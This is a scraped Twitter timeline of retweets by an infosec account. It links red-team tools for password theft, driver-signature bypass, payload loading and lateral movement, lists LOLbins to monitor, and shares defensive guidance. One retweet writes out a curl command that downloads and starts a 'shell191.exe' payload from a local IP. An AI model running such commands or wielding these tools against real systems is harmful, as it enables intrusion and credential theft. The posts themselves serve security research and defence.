Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @zw0scura
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @zw0scura
-
zw0scura proslijedio/la je Tweet
TeamViewer stored user passwords encrypted, not hashed, and the key is now publichttps://whynotsecurity.com/blog/teamviewer/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
#FakeLogonScreen is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with#CobaltStrike's execute-assembly command. https://github.com/bitsadmin/fakelogonscreen …pic.twitter.com/2pAOk9InLMHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore, https://github.com/hfiref0x/KDU pic.twitter.com/s154qYlIKR
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Firefox now shows what telemetry data it's collecting about you Just go to about:telemetry https://www.zdnet.com/article/firefox-now-shows-what-telemetry-data-its-collecting-about-you/ …pic.twitter.com/erW5EamI93
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Cobalt Strike kit for Lateral Movementhttps://github.com/0xthirteen/MoveKit …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Load encrypted PE from XML Attribute. MSBuild is still the best.
https://github.com/XwingAngel/PELoader/ …
MSBuild sets Property then calls Execute.
Use this example to decouple payloads & prove that all security products have a "Single File Bias".
Decouple payloads to subvert detection.pic.twitter.com/648rujlLQn
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working. https://github.com/inv-ds-research/yaraml_rules …pic.twitter.com/sfuXEkHeNO
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
"Using object linking, it is possible to link the RTF files to the remote object which could be the link to the malicious resource hosted on the remote server. This leads the resulting RTF file to behave as a downloader" https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/ …
#malware#cybersecuritypic.twitter.com/P43YmutaZJ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Be a smart defender! No excuses, don’t need expensive EDR or fancy tools.
@olafhartong on monitoring using available tools for intelligent monitoring, linked to@MITREattack ,+ready to use for threat hunting! Sysmon module + TH app —> http://github.com/olafhartong#infosec#NLSecureIDpic.twitter.com/vmdsoIWouh
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Windows passwords decryption from dump files
#infosec#pentest#redteam https://github.com/AlessandroZ/LaZagneForensic …pic.twitter.com/50cBDaEUNAHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
[Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Some Lateral Movement Methods: -Pass the Hash/Relay ((Net-)NTLM) -Pass the Ticket (Silver/Golden) -RDP (Legit creds) -Remote Services (VNC/SSH) -(D)COM (Remote sched tasks, Services, WMI) -Remote Service Vuln (EB) -Admin Shares (PSExec) -Webshell (Chopper) -WinRM (PS Remoting)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Introducing the Mitigating Malware and Preventing Lateral Movement Guidance
#infosec#blueteamhttps://www.ncsc.gov.uk/blog-post/introducing-mitigating-malware-and-preventing-lateral-movement-guidance …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP.
#infosec#pentest#redteam https://github.com/SECFORCE/Tunna pic.twitter.com/StLPqTShsNHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
#Curl.exe is the new#rundll32.exe -#LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 … https://youtu.be/f2xpCl2Y7t8#blueteam#redteam#dfir#ThreatHuntingPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Using Alternate Data Streams to Bypass User Account Controls
#infosec#pentest#redteam https://redcanary.com/blog/using-alternate-data-streams-bypass-user-account-controls/ …pic.twitter.com/nZpvFowVLEHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic
#infosec#pentest#redteam#blueteam https://github.com/Srinivas11789/PcapXray/blob/master/README.md …pic.twitter.com/eYuOERHxP9
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
For enumerating subdomains I always use
@zer0pwn's Spyse API wrapper. It's so f'in good! https://github.com/zeropwn/spyse.py …#bugbountytips#bugbountytip#bugbounties#bugbounty#infosecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zw0scura proslijedio/la je Tweet
Log Sources - ordered by priority - with ratings in different categories - personal and highly subjective assessment - from my most recent slide deck on low hanging fruits in security monitoring
#SIEM#SecurityMonitoring#ThreatHuntingpic.twitter.com/wuWImWLB77
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.